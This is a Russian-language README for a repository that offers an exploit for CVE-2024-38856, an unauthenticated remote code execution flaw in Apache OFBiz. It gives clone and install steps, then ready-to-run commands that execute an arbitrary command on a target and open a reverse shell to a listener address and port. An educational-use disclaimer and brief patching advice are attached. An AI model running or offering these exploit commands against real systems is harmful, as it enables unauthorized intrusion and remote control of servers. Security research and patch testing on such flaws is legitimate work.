
Эксплойт для Apache OFBiz - CVE-2024-38856
Эксплойт для Apache OFBiz (CVE-2024-38856) Автор: Alisson Faoli
Этот репозиторий содержит эксплойт для уязвимости CVE-2024-38856, обнаруженной в Apache OFBiz. Уязвимость позволяет выполнить удаленный код без аутентификации (RCE).
Примечание: Данный эксплойт предоставляется только в образовательных и исследовательских целях. Неправильное использование может быть незаконным и является исключительной ответственностью пользователя.
CVE: CVE-2024-38856
Затронутое ПО: Apache OFBiz до версии 18.12.14
Тип уязвимости: RCE
Эксплуатация: Аутентификация не требуется
Клонируйте репозиторий:
git clone https://github.com/AlissonFaoli/Apache-OFBiz-Exploit.git
cd Apache-OFBiz-Exploit
Установите зависимости:
pip install -r requirements.txt
Запустите эксплойт:
RCE:
python3 CVE-2024-38856.py cmd -t https://10.150.10.200:8443 "whoami"
SHELL:
python3 CVE-2024-38856.py shell -t https://10.150.10.200:8443 -l 10.150.10.123 -p 4444
Для устранения этой уязвимости рекомендуется администраторам Apache OFBiz: Обновиться до исправленной версии, доступной по адресу https://ofbiz.apache.org/download.html. Применить правила межсетевого экрана или WAF для блокировки известных попыток эксплуатации.
Если у вас есть вопросы или вы хотите сообщить об улучшении эксплойта, свяжитесь со мной: LinkedIn: https://linkedin.com/in/alisson-faoli/
Этот код предоставляется исключительно для образовательных целей и тестирования безопасности в авторизованных средах. Автор не несет ответственности за любое неправомерное использование.